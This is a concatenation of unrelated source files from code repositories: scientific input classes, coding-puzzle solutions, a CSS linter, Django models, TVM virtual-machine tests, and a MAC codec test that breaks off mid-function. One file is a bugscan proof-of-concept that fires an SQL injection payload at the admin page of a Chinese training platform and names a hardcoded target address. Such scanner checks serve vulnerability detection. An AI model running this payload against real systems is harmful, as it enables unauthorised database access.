500dad7ffb9764ef76085a688676e4c8740d9482 | 1a59a9076c1e9f1eb98e24ff41a4c1c95e2b353e | /xcp2k/classes/_mm1.py | c5b93af6d2c6b11ace7e30bed1ee50a1f93ba2cc | [] | no_license | Roolthasiva/xcp2k | 66b2f30ebeae1a946b81f71d22f97ea4076e11dc | fc3b5885503c6f6dc549efeb4f89f61c8b6b8242 | refs/heads/master | 2022-12-23T06:03:14.033521 | 2020-10-07T08:01:48 | 2020-10-07T08:01:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,236 | py | from xcp2k.inputsection import InputSection
from xcp2k.classes._forcefield1 import _forcefield1
from xcp2k.classes._neighbor_lists5 import _neighbor_lists5
from xcp2k.classes._poisson2 import _poisson2
from xcp2k.classes._periodic_efield2 import _periodic_efield2
from xcp2k.classes._print44 import _print44
class _mm1(InputSection):
def __init__(self):
InputSection.__init__(self)
self.FORCEFIELD = _forcefield1()
self.NEIGHBOR_LISTS = _neighbor_lists5()
self.POISSON = _poisson2()
self.PERIODIC_EFIELD_list = []
self.PRINT = _print44()
self._name = "MM"
self._subsections = {'FORCEFIELD': 'FORCEFIELD', 'NEIGHBOR_LISTS': 'NEIGHBOR_LISTS', 'POISSON': 'POISSON', 'PRINT': 'PRINT'}
self._repeated_subsections = {'PERIODIC_EFIELD': '_periodic_efield2'}
self._attributes = ['PERIODIC_EFIELD_list']
def PERIODIC_EFIELD_add(self, section_parameters=None):
new_section = _periodic_efield2()
if section_parameters is not None:
if hasattr(new_section, 'Section_parameters'):
new_section.Section_parameters = section_parameters
self.PERIODIC_EFIELD_list.append(new_section)
return new_section
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
f1a26d8535ee4e801718164bb5381dda69821129 | a9fe1b5c320cdef138ac4a942a8b741c7f27de7c | /LC1165-Single-Row-Keyboard.py | b61ee59f2cb456449c1170110439d12eae92960f | [] | no_license | kate-melnykova/LeetCode-solutions | a6bbb5845310ce082770bcb92ef6f6877962a8ee | ee8237b66975fb5584a3d68b311e762c0462c8aa | refs/heads/master | 2023-06-28T06:35:33.342025 | 2021-07-30T06:59:31 | 2021-07-30T06:59:31 | 325,106,033 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,221 | py | """
There is a special keyboard with all keys in a single row.
Given a string keyboard of length 26 indicating the layout of
the keyboard (indexed from 0 to 25), initially your finger is
at index 0. To type a character, you have to move your finger
to the index of the desired character. The time taken to move
your finger from index i to index j is |i - j|.
You want to type a string word. Write a function to calculate
how much time it takes to type it with one finger.
Example 1:
Input: keyboard = "abcdefghijklmnopqrstuvwxyz", word = "cba"
Output: 4
Explanation: The index moves from 0 to 2 to write 'c' then to 1
to write 'b' then to 0 again to write 'a'.
Total time = 2 + 1 + 1 = 4.
Example 2:
Input: keyboard = "pqrstuvwxyzabcdefghijklmno", word = "leetcode"
Output: 73
Constraints:
(*) keyboard.length == 26
(*) keyboard contains each English lowercase letter exactly once in some order.
(*) 1 <= word.length <= 10^4
(*) word[i] is an English lowercase letter.
"""
class Solution:
def calculateTime(self, keyboard: str, word: str) -> int:
"""
Runtime complexity: O(n)
Space complexity: O(n)
"""
locations = {key: i for i, key in enumerate(keyboard)}
loc = 0
dist = 0
for char in word:
dist += abs(loc - locations[char])
loc = locations[char]
return dist
def calculateTimeNoSpace(self, keyboard: str, word: str) -> int:
"""
Runtime complexity: O(n^2)
Space complexity: O(1)
"""
self.keyboard = keyboard
loc = 0
dist = 0
for char in word:
new_loc = self._get_loc(char)
dist += abs(loc - new_loc)
loc = new_loc
return dist
def _get_loc(self, char: str):
return self.keyboard.index(char)
if __name__ == '__main__':
from run_tests import run_tests
correct_answers = [
["abcdefghijklmnopqrstuvwxyz", "cba", 4],
["pqrstuvwxyzabcdefghijklmno", "leetcode", 73]
]
methods = ['calculateTime', 'calculateTimeNoSpace']
for method in methods:
print(f'Running tests for {method}')
run_tests(getattr(Solution(), method), correct_answers) | [
"forkatemelnikova@gmail.com"
] | forkatemelnikova@gmail.com |
d710e3ef0ea5e49cc3e3ccc4c458b75b14108bf1 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03062/s886815102.py | 0d88d0f6b8fc038f5e52c29a4351c0e0d7bc5afb | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 223 | py | def main():
n=int(input())
a=list(map(int,input().split()))
dp=[0,-10**18]
for i in range(n-1):
dp2=[max(dp[0]+a[i],dp[1]-a[i]),max(dp[0]-a[i],dp[1]+a[i])]
dp=dp2
print(max(dp[0]+a[-1],dp[1]-a[-1]))
main() | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
371d66ddc5a6c081888fb63f8a81dac1623b1f4d | d3e4c3527884f28ac554c9a919b4859a4fb21a7a | /ckstyle/CssCheckerWrapper.py | 5d86c4842c7202e70c9958514c6b8432ece320fa | [
"BSD-3-Clause"
] | permissive | kxws888/CSSCheckStyle | 4032ca1d2b86d5ac85613bc17125389361678bfc | 4b4b89495fd8bb6a211d22a559e76032cd1b860c | refs/heads/master | 2021-01-16T19:39:23.440607 | 2012-11-09T03:37:44 | 2012-11-09T03:37:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,836 | py | #/usr/bin/python
#encoding=utf-8
import os
from plugins.Base import *
class CssChecker():
'''CSS检查类,需要CSS解析器作为辅助'''
def __init__(self, parser, config = None):
self.parser = parser
self.config = config
# 错误记录,log是2级,warn是1级,error是0级
self.logMsgs = []
self.warningMsgs = []
self.errorMsgs = []
# 额外的错误记录,比如工具内部的一些错误等
self.extraMsgs = []
# 注册的不同类型的检查器(都来自plugins目录)
self.ruleSetCheckers = []
self.ruleCheckers = []
self.styleSheetCheckers = []
# 如果有解析过程的错误,则先把那些错误记录下来
self.handleParseErrors()
def getStyleSheet(self):
'''获取styleSheet引用'''
return self.parser.styleSheet
def handleParseErrors(self):
for msg in self.parser.getParseErrors():
self.remember(msg[0], msg[1])
def hasError(self):
'''判断是否有error'''
return len(self.logMsgs) != 0 or len(self.warningMsgs) != 0 or len(self.errorMsgs) != 0
def errors(self):
'''把错误信息导出'''
return self.logMsgs, self.warningMsgs, self.errorMsgs
def loadPlugins(self, pluginDir):
'''从plugins目录动态载入检查类'''
# ids = {}
include = self.config.include
exclude = self.config.exclude
for filename in os.listdir(pluginDir):
if not filename.endswith('.py') or filename.startswith('_'):
continue
if filename == 'Base.py' or filename == 'helper.py':
continue
pluginName = os.path.splitext(filename)[0]
# 获取plugins的引用
plugin = __import__("ckstyle.plugins." + pluginName, fromlist = [pluginName])
pluginClass = None
if hasattr(plugin, pluginName):
pluginClass = getattr(plugin, pluginName)
else:
print '[TOOL] class %s should exist in %s.py' % (pluginName, pluginName)
continue
# 构造plugin的类
instance = pluginClass()
# ids[instance.id] = pluginName
if include != 'all' and include.find(instance.id) == -1:
continue
elif exclude != 'none' and exclude.find(instance.id) != -1:
continue
if instance.errorMsg.find(';') != -1 or instance.errorMsg.find('\n') != -1:
print r'[TOOL] errorMsg should not contain ";" or "\n" in %s.py' % pluginName
continue
# 注册到检查器中
self.registerChecker(instance)
def registerChecker(self, checker):
'''根据检查器类型的不同,分别注册到不同的检查器列表中'''
if isinstance(checker, RuleChecker):
self.registerRuleChecker(checker)
elif isinstance(checker, RuleSetChecker):
self.registerRuleSetChecker(checker)
else:
self.registerStyleSheetChecker(checker)
def registerStyleSheetChecker(self, checker):
self.styleSheetCheckers.append(checker)
def registerRuleSetChecker(self, checker):
self.ruleSetCheckers.append(checker)
def registerRuleChecker(self, checker):
self.ruleCheckers.append(checker)
def remember(self, errorLevel, errorMsg):
'''记录代码中的问题'''
if errorLevel == ERROR_LEVEL.LOG:
if self.config.errorLevel > 1:
self.logMsgs.append(errorMsg)
elif errorLevel == ERROR_LEVEL.WARNING:
if self.config.errorLevel > 0:
self.warningMsgs.append(errorMsg)
elif errorLevel == ERROR_LEVEL.ERROR:
self.errorMsgs.append(errorMsg)
else:
print '[TOOL] wrong ErrorLevel for ' + errorMsg
def logStyleSheetMessage(self, checker, styleSheet):
'''记录StyleSheet的问题'''
errorLevel = checker.getLevel()
errorMsg = checker.getMsg()
if errorMsg is None or errorMsg == '':
print '[TOOL] no errorMsg in your plugin, please check it'
if errorMsg.find('${file}') == -1:
errorMsg = errorMsg + ' (from "' + styleSheet.getFile() + '")'
else:
errorMsg = errorMsg.replace('${file}', styleSheet.getFile())
self.remember(errorLevel, errorMsg);
def logRuleMessage(self, checker, rule):
'''记录一条key/value的问题'''
errorLevel = checker.getLevel()
errorMsg = checker.getMsg()
if errorMsg is None or errorMsg == '':
print '[TOOL] no errorMsg in your plugin, please check it'
if errorMsg.find('${selector}') == -1:
errorMsg = errorMsg + ' (from "' + rule.selector + '")'
else:
errorMsg = errorMsg.replace('${selector}', rule.selector)
errorMsg = errorMsg.replace('${name}', rule.roughName.strip())
errorMsg = errorMsg.replace('${value}', rule.value.strip())
self.remember(errorLevel, errorMsg);
def logRuleSetMessage(self, checker, ruleSet):
'''记录一个"规则集"中的问题'''
errorLevel = checker.getLevel()
errorMsg = checker.getMsg()
if errorMsg.find('${selector}') == -1:
errorMsg = errorMsg + ' (from "' + ruleSet.selector + '")'
else:
errorMsg = errorMsg.replace('${selector}', ruleSet.selector)
self.remember(errorLevel, errorMsg);
def doCheck(self):
# 忽略的规则集(目前只忽略单元测试的selector)
ignoreRuleSets = self.config.ignoreRuleSets
def findInArray(array, value):
for x in array:
if x == value:
return True
return False
# 检查规则集
def checkRuleSet(ruleSet):
for checker in self.ruleSetCheckers:
if not checker.check(ruleSet):
self.logRuleSetMessage(checker, ruleSet)
# 检查规则
def checkRule(ruleSet):
for checker in self.ruleCheckers:
for rule in ruleSet._rules:
if not checker.check(rule):
self.logRuleMessage(checker, rule)
# 检查样式表
styleSheet = self.parser.styleSheet
for checker in self.styleSheetCheckers:
if not checker.check(styleSheet):
self.logStyleSheetMessage(checker, styleSheet)
for ruleSet in styleSheet.getRuleSets():
# 判断此规则是否忽略
if findInArray(ignoreRuleSets, ruleSet.selector):
continue
checkRuleSet(ruleSet)
checkRule(ruleSet)
| [
"wangjeaf@gmail.com"
] | wangjeaf@gmail.com |
79e9eb04ba894732a459e4b01ae2261d362576b6 | 0639b8366a5ec5b65fa2097354eafd5a1f73ad0f | /hoodalert/migrations/0004_rename_post_posts_description.py | a95d995b2021efa24eef56d75d243980d8350f44 | [
"MIT"
] | permissive | COdingaorg/Neighbourhood_Alert | cc27a32af7df070f9d49380c4d3f0067f8535668 | 44e202469b4a2410d1dab2244e62915575f8ea84 | refs/heads/main | 2023-06-20T20:38:19.301358 | 2021-07-27T22:36:34 | 2021-07-27T22:36:34 | 388,885,612 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | # Generated by Django 3.2.4 on 2021-07-25 21:22
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('hoodalert', '0003_rename_location_business_location_or_description'),
]
operations = [
migrations.RenameField(
model_name='posts',
old_name='post',
new_name='description',
),
]
| [
"calemasanga@gmail.com"
] | calemasanga@gmail.com |
0554493246cab9a13e295982e86c557585680403 | e0c8662a56d89730043146ddc340e9e0b9f7de72 | /plugin/11dde802-1596.py | 7382d4960741b91aca87fcdb6f1f45c45dde3640 | [] | no_license | izj007/bugscan_poc | f2ef5903b30b15c230b292a1ff2dc6cea6836940 | 4490f3c36d4033bdef380577333722deed7bc758 | refs/heads/master | 2020-09-22T17:20:50.408078 | 2019-01-18T09:42:47 | 2019-01-18T09:42:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 798 | py | #coding:utf-8
from lib.curl import *
# -*- coding: utf-8 -*-
"""
POC Name : 企慧通培训系统通用型SQL注入 2
Author : a
mail : a@lcx.cc
refer : http://www.wooyun.org/bugs/wooyun-2015-0129326
"""
def assign(service, arg):
if service == 'qht_study': #企慧通网络培训系统
return True,arg
def audit(arg):
p = "SysAdmin/aRegisAdmin.aspx?type=regisAdmin&clientid=adminName&adminName=admin'%20and%20sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))>0--"
url = arg + p
code2, head, res, errcode, _ = curl.curl2(url )
if (code2 ==500) and ('0x81dc9bdb52d04dc20036dbd8313ed055' in res):
security_hole(url)
if __name__ == '__main__':
from dummy import *
audit(assign('qht_study', 'http://124.193.233.233/')[1]) | [
"yudekui@wsmtec.com"
] | yudekui@wsmtec.com |
2a493183c3d04027dce5a0966c86c5e83e023540 | 8f2f83bc1381d4ce7fc968aec72fa400aae4155d | /api/smartcontractwallet/requestmodels/createtransactionrequest.py | 45a7a4eb65363aeada372be706d0cc2d9c527908 | [
"MIT"
] | permissive | nifrali/pyStratis | c855fb33be77064c9a741255e324003319a4789f | b1a80bf155b7941e9ef8fc2ea93fa1b08a0c4366 | refs/heads/master | 2023-06-20T16:02:30.863589 | 2021-07-01T19:24:18 | 2021-07-01T19:24:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,929 | py | from typing import Optional, List
from pydantic import Field, SecretStr, validator, conint
from pybitcoin import Model, Outpoint, SmartContractParameter
from pybitcoin.types import Address, Money, hexstr
class CreateContractTransactionRequest(Model):
"""A request model for the smartcontractwallet/create endpoint.
Args:
wallet_name (str): The wallet name.
account_name (str, optional): The wallet name. Default='account 0'
outpoints (List[Outpoint], optional): A list of the outpoints used to construct the transactation.
amount (Money, optional): The amount being sent.
fee_amount (Money): The fee amount.
password (SecretStr): The password.
contract_code (hexstr): The smart contract code hexstring.
gas_price (int): The amount of gas being used in satoshis.
gas_limit (int): The maximum amount of gas that can be used in satoshis.
sender (Address): The address of the sending address.
parameters (List[SmartContractParameters], optional): A list of parameters for the smart contract.
"""
wallet_name: str = Field(alias='walletName')
account_name: Optional[str] = Field(default='account 0', alias='accountName')
outpoints: Optional[List[Outpoint]]
amount: Optional[Money]
fee_amount: Money = Field(alias='feeAmount')
password: SecretStr
contract_code: hexstr = Field(alias='contractCode')
gas_price: conint(ge=100, le=10000) = Field(alias='gasPrice')
gas_limit: conint(ge=12000, le=250000) = Field(alias='gasLimit')
sender: Address
parameters: Optional[List[SmartContractParameter]]
# noinspection PyMethodParameters,PyUnusedLocal
@validator('fee_amount', always=True)
def check_fee_too_high(cls, v, values):
if v is not None:
if v > Money(1):
raise ValueError('Fee should not be more than 1. Check parameters.')
return v
| [
"skaal@protonmail.com"
] | skaal@protonmail.com |
8c3c54a6db6ad3c4483c0d3590021ca975729a91 | be0f3dfbaa2fa3d8bbe59229aef3212d032e7dd1 | /Gauss_v45r9/Gen/DecFiles/options/27495730.py | fbd2677bd68269f36de53c1ffd7c30736c15bdcc | [] | no_license | Sally27/backup_cmtuser_full | 34782102ed23c6335c48650a6eaa901137355d00 | 8924bebb935b96d438ce85b384cfc132d9af90f6 | refs/heads/master | 2020-05-21T09:27:04.370765 | 2018-12-12T14:41:07 | 2018-12-12T14:41:07 | 185,989,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,001 | py | # file /home/hep/ss4314/cmtuser/Gauss_v45r9/Gen/DecFiles/options/27495730.py generated: Fri, 27 Mar 2015 16:10:18
#
# Event Type: 27495730
#
# ASCII decay Descriptor: {[ D_s2*+ -> D0 K+, D*0 K+, D+ K_S0, D*+ K_S0 ]cc}
#
from Configurables import Generation
Generation().EventType = 27495730
Generation().SampleGenerationTool = "SignalPlain"
from Configurables import SignalPlain
Generation().addTool( SignalPlain )
Generation().SignalPlain.ProductionTool = "PythiaProduction"
from Configurables import ToolSvc
from Configurables import EvtGenDecay
ToolSvc().addTool( EvtGenDecay )
ToolSvc().EvtGenDecay.UserDecayFile = "$DECFILESROOT/dkfiles/Ds2st_2710=DecProdCut.dec"
Generation().SignalPlain.CutTool = "DaughtersInLHCb"
Generation().SignalPlain.SignalPIDList = [ 435,-435 ]
from Configurables import LHCb__ParticlePropertySvc
LHCb__ParticlePropertySvc().Particles = [ "D*_s2+ 174 435 1.0 2.710 4.388079327e-24 D_s2*+ 435 0.351483","D*_s2- 178 -435 -1.0 2.710 4.388079327e-24 D_s2*- -435 0.351483" ]
| [
"slavomirastefkova@b2pcx39016.desy.de"
] | slavomirastefkova@b2pcx39016.desy.de |
6af55db5f3c9b0295b930e7f55c893d74261ebfc | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03597/s285485518.py | 0cfbe771bc66bf9c607b389302e54701b59d4ae2 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 67 | py | N = int(input())
A = int(input())
black = (N * N - A)
print(black) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
af68b0329ba63995851e1b1bb606430cffd086fe | 954ceac52dfe831ed7c2b302311a20bb92452727 | /tests/python/relax/test_vm_execbuilder.py | 9a7cd0c87938eb15f27084ffd2f7b3f5b4afc5fc | [
"Apache-2.0",
"LLVM-exception",
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"Zlib",
"Unlicense",
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | tqchen/tvm | a0e4aefe8b8dccbdbe6f760549bed6e9545ad4a1 | 678d01dd4a4e75ef6186ce356bb1a20e584a7b24 | refs/heads/main | 2023-08-10T02:21:48.092636 | 2023-02-25T18:22:10 | 2023-02-25T18:22:10 | 100,638,323 | 23 | 8 | Apache-2.0 | 2023-02-20T16:28:46 | 2017-08-17T19:30:37 | Python | UTF-8 | Python | false | false | 8,597 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Lowest level testing VM. Test execbuilder and execution."""
import tvm
import pytest
import numpy as np
from tvm import relax, TVMError
from tvm.relax.testing.vm import check_saved_func
def test_vm_execute():
ib = relax.ExecBuilder()
with ib.function("func0", num_inputs=2):
ib.emit_call("test.vm.add", args=[ib.r(0), ib.r(1)], dst=ib.r(2))
ib.emit_ret(ib.r(2))
ex = ib.get()
vm = relax.VirtualMachine(ex, tvm.cpu())
a = tvm.nd.array(
np.random.rand(
4,
)
)
b = tvm.nd.array(
np.random.rand(
4,
)
)
add_res = check_saved_func(vm, "func0", a, b)
tvm.testing.assert_allclose(add_res.numpy(), a.numpy() + b.numpy(), rtol=1e-7, atol=1e-7)
def test_vm_multiple_func():
ib = relax.ExecBuilder()
with ib.function("func0", num_inputs=2):
ib.emit_call("test.vm.add", args=[ib.r(0), ib.r(1)], dst=ib.r(2))
ib.emit_ret(ib.r(2))
with ib.function("func1", num_inputs=2):
ib.emit_call("test.vm.mul", args=[ib.r(0), ib.r(1)], dst=ib.r(2))
ib.emit_ret(ib.r(2))
ex = ib.get()
vm = relax.VirtualMachine(ex, tvm.cpu())
a = tvm.nd.array(
np.random.rand(
4,
)
)
b = tvm.nd.array(
np.random.rand(
4,
)
)
mul_res = check_saved_func(vm, "func1", a, b)
add_res = check_saved_func(vm, "func0", a, b)
tvm.testing.assert_allclose(add_res.numpy(), a.numpy() + b.numpy(), rtol=1e-7, atol=1e-7)
tvm.testing.assert_allclose(mul_res.numpy(), a.numpy() * b.numpy(), rtol=1e-7, atol=1e-7)
def test_vm_checker():
ib = relax.ExecBuilder()
with pytest.raises(TVMError):
with ib.function("func0", num_inputs=2):
ib.emit_call("test.vm.add", args=[ib.r(0), ib.r(2)], dst=ib.r(2))
ib.emit_ret(ib.r(2))
ib.get()
def test_neg_imm():
ib = relax.ExecBuilder()
with ib.function("func0", num_inputs=1):
ib.emit_call("test.vm.add_scalar", args=[ib.imm(-3), ib.r(0)], dst=ib.r(1))
ib.emit_ret(ib.r(1))
ib.get()
ex = ib.get()
vm = relax.VirtualMachine(ex, tvm.cpu())
assert vm["func0"](1) == -2
assert vm["func0"](-3) == -6
def test_emit_cache():
ib = relax.ExecBuilder()
with ib.function("func0", num_inputs=1):
x0 = ib.convert_constant("str0")
x1 = ib.convert_constant("str0")
# cache constant str
assert x0 == x1
s0 = ib.convert_constant(tvm.runtime.container.ShapeTuple([1, 2]))
s1 = ib.convert_constant(tvm.runtime.container.ShapeTuple([1, 2]))
s2 = ib.convert_constant(tvm.runtime.container.ShapeTuple([1, 3]))
assert s0 == s1
assert s1 != s2
y0 = ib.convert_constant(tvm.nd.array(np.array([1, 2, 3]).astype("int32")))
y1 = ib.convert_constant(tvm.nd.array(np.array([1, 2, 3]).astype("int32")))
assert y0 == y1
ib.emit_ret(ib.r(0))
def test_vm_formalize():
ib0 = relax.ExecBuilder()
ib1 = relax.ExecBuilder()
with ib0.function("func0", num_inputs=2):
ib0.emit_call("test.vm.add", args=[ib0.r(0), ib0.r(1)], dst=ib0.r(100))
ib0.emit_call("test.vm.mul", args=[ib0.r(1), ib0.r(100)], dst=ib0.r(50))
ib0.emit_ret(ib0.r(50))
with ib1.function("func0", num_inputs=2):
ib1.emit_call("test.vm.add", args=[ib1.r(0), ib1.r(1)], dst=ib1.r(2))
ib1.emit_call("test.vm.mul", args=[ib1.r(1), ib1.r(2)], dst=ib1.r(3))
ib1.emit_ret(ib1.r(3))
exec0 = ib0.get()
exec1 = ib1.get()
assert exec0.as_text() == exec1.as_text()
def test_vm_operand():
ib0 = relax.ExecBuilder()
with ib0.function("func0", num_inputs=2):
ib0.emit_call("test.vm.add_scalar", args=[ib0.r(0), ib0.r(1)], dst=ib0.r(2))
ib0.emit_ret(ib0.r(2))
exec0 = ib0.get()
vm = relax.VirtualMachine(exec0, tvm.cpu())
res = vm["func0"](2, 3)
assert res == 5
ib1 = relax.ExecBuilder()
with ib1.function("func1", num_inputs=1):
ib1.emit_call("test.vm.get_device_id", args=[ib1.r(0)], dst=ib1.r(1))
ib1.emit_ret(ib1.r(1))
exec1 = ib1.get()
vm = relax.VirtualMachine(exec1, tvm.cpu())
res = vm["func1"](tvm.cpu(3))
assert res == 3
def test_vm_shapeof():
ib = relax.ExecBuilder()
shape = (32, 16)
arr = tvm.nd.array(np.random.rand(*shape))
with ib.function("main", num_inputs=0):
ib.emit_call("vm.builtin.shape_of", args=[arr], dst=ib.r(0))
ib.emit_ret(ib.r(0))
ex = ib.get()
vm = relax.VirtualMachine(ex, tvm.cpu())
res = vm["main"]()
for i, s in enumerate(res):
assert s == shape[i]
def test_vm_storage():
dtype = tvm.DataType("float32")
shape = (4, 6)
ib = relax.ExecBuilder()
with ib.function("main", num_inputs=0):
ib.emit_call(
"vm.builtin.alloc_storage",
args=[ib.vm_state(), (24,), ib.convert_constant(0), dtype],
dst=ib.r(1),
)
ib.emit_call(
"vm.builtin.alloc_tensor", args=[ib.r(1), ib.imm(0), shape, dtype], dst=ib.r(2)
)
ib.emit_ret(ib.r(2))
ex = ib.get()
vm = relax.VirtualMachine(ex, tvm.cpu())
res = vm["main"]()
assert res.device == tvm.cpu()
assert res.shape == shape
def test_vm_goto():
ib = relax.ExecBuilder()
with ib.function("main", num_inputs=2):
ib.emit_call("test.vm.add", args=[ib.r(0), ib.r(1)], dst=ib.r(2))
ib.emit_goto(2)
ib.emit_call("test.vm.mul", args=[ib.r(2), ib.r(1)], dst=ib.r(2))
ib.emit_ret(ib.r(2))
ex = ib.get()
vm = relax.VirtualMachine(ex, tvm.cpu())
a = tvm.nd.array(
np.random.rand(
4,
)
)
b = tvm.nd.array(
np.random.rand(
4,
)
)
res = check_saved_func(vm, "main", a, b)
tvm.testing.assert_allclose(res.numpy(), a.numpy() + b.numpy(), rtol=1e-7, atol=1e-7)
def test_vm_if():
ib = relax.ExecBuilder()
with ib.function("main", num_inputs=3):
ib.emit_if(ib.r(0), 3)
ib.emit_call("test.vm.add", args=[ib.r(1), ib.r(2)], dst=ib.r(3))
ib.emit_goto(2)
ib.emit_call("test.vm.mul", args=[ib.r(1), ib.r(2)], dst=ib.r(3))
ib.emit_ret(ib.r(3))
ex = ib.get()
vm = relax.VirtualMachine(ex, tvm.cpu())
a = tvm.nd.array(
np.random.rand(
4,
)
)
b = tvm.nd.array(
np.random.rand(
4,
)
)
res = vm["main"](0, a, b)
tvm.testing.assert_allclose(res.numpy(), a.numpy() * b.numpy(), rtol=1e-7, atol=1e-7)
res = vm["main"](1, a, b)
tvm.testing.assert_allclose(res.numpy(), a.numpy() + b.numpy(), rtol=1e-7, atol=1e-7)
def test_vm_invoke_closure():
ib = relax.ExecBuilder()
with ib.function("lifted_func_1", num_inputs=4):
ib.emit_call("test.vm.add", args=[ib.r(0), ib.r(1)], dst=ib.r(4))
ib.emit_call("test.vm.add", args=[ib.r(2), ib.r(4)], dst=ib.r(5))
ib.emit_call("test.vm.add", args=[ib.r(3), ib.r(5)], dst=ib.r(6))
ib.emit_ret(ib.r(6))
with ib.function("main", num_inputs=2):
ib.emit_call(
"vm.builtin.make_closure", args=[ib.f("lifted_func_1"), ib.r(0), ib.r(1)], dst=ib.r(2)
)
ib.emit_ret(ib.r(2))
ex = ib.get()
vm = relax.VirtualMachine(ex, tvm.cpu())
w_inp = tvm.nd.array(np.random.rand(2, 3))
x_inp = tvm.nd.array(np.random.rand(2, 3))
y_inp = tvm.nd.array([[3.1, 4.0, 5.0], [6.0, 7.1, 9.0]])
z_inp = tvm.nd.array(np.random.rand(2, 3))
clo = vm["main"](w_inp, x_inp)
res = vm.invoke_closure(clo, y_inp, z_inp)
tvm.testing.assert_allclose(
res.numpy(), w_inp.numpy() + x_inp.numpy() + y_inp.numpy() + z_inp.numpy()
)
if __name__ == "__main__":
tvm.testing.main()
| [
"tianqi.tchen@gmail.com"
] | tianqi.tchen@gmail.com |
54799a216da1ac96622d8c6b155e31f987d78435 | 03b724302ee3989b97ea11c5323fab639349661a | /thjobsthai/migrations/0001_initial.py | bf3cce65c0e0a00c06cc5eb40a971a42a4608a32 | [] | no_license | saisai/django_jobs_apply | 8e2eccd9e0884d2788d09407c24da12b4c80de53 | 816602e05bdfbef8d5306ca3592fa0d4df538c5e | refs/heads/master | 2022-12-01T19:54:36.119216 | 2020-08-18T23:31:21 | 2020-08-18T23:31:21 | 288,165,221 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 730 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-10-10 06:37
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='JobThai',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=500)),
('link', models.TextField()),
('created_date', models.DateField()),
],
options={
'db_table': 'job_thai',
},
),
]
| [
"you@example.com"
] | you@example.com |
3d34bbaa9221ae9eaeb9290f8d4c2c6720415cc8 | 02e5ec4b8b038d335d726d12047d5dacea01456e | /person_django_rest_swagger/serializers.py | b2cc273d6ea98a7394b26d6304baca7b2bcc0e4b | [] | no_license | rahulmoundekar/django_rest_curd_app_swagger | d298d18356ac9253b16320255b329aacd4904a56 | 3473812ae21c5be7b8f2105e8d16aebab54d4fa8 | refs/heads/master | 2021-05-24T19:08:27.658832 | 2020-04-07T06:58:52 | 2020-04-07T06:58:52 | 253,710,900 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 214 | py | from rest_framework import serializers
from person_django_rest_swagger.models import Person
class PersonSerializer(serializers.ModelSerializer):
class Meta:
model = Person
fields = '__all__'
| [
"rahulmoundekar44@gmail.com"
] | rahulmoundekar44@gmail.com |
72e629552847f36e6921f8e65c120df05721b1c7 | 9e2d79a2cf1dbeaffe8ef897bb53f94af8b5b68c | /ichnaea/models/tests/test_mac.py | 68cca667cd7319c1acf7541ccab7d0f515cab920 | [
"Apache-2.0"
] | permissive | amolk4games/ichnaea | a7d1cbd12b6aa5c0d877fca380080b08fcff24b8 | 907c542da05b428c8e994bce1537390e22b3ca58 | refs/heads/master | 2021-01-19T07:21:54.851167 | 2016-04-08T15:20:37 | 2016-04-08T15:21:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,198 | py | from ichnaea.models.mac import (
decode_mac,
encode_mac,
)
from ichnaea.tests.base import (
TestCase,
)
class TestMacCodec(TestCase):
def test_decode(self):
value = decode_mac(b'\xab\xcd\xed\x124V')
self.assertEqual(value, 'abcded123456')
value = decode_mac(b'q83tEjRW', codec='base64')
self.assertEqual(value, 'abcded123456')
def test_encode(self):
value = encode_mac('abcded123456')
self.assertEqual(len(value), 6)
self.assertEqual(value, b'\xab\xcd\xed\x124V')
value = encode_mac('abcded123456', codec='base64')
self.assertEqual(value, b'q83tEjRW')
def test_max(self):
value = encode_mac('ffffffffffff')
self.assertEqual(len(value), 6)
self.assertEqual(value, b'\xff\xff\xff\xff\xff\xff')
value = encode_mac('ffffffffffff', codec='base64')
self.assertEqual(value, b'////////')
def test_min(self):
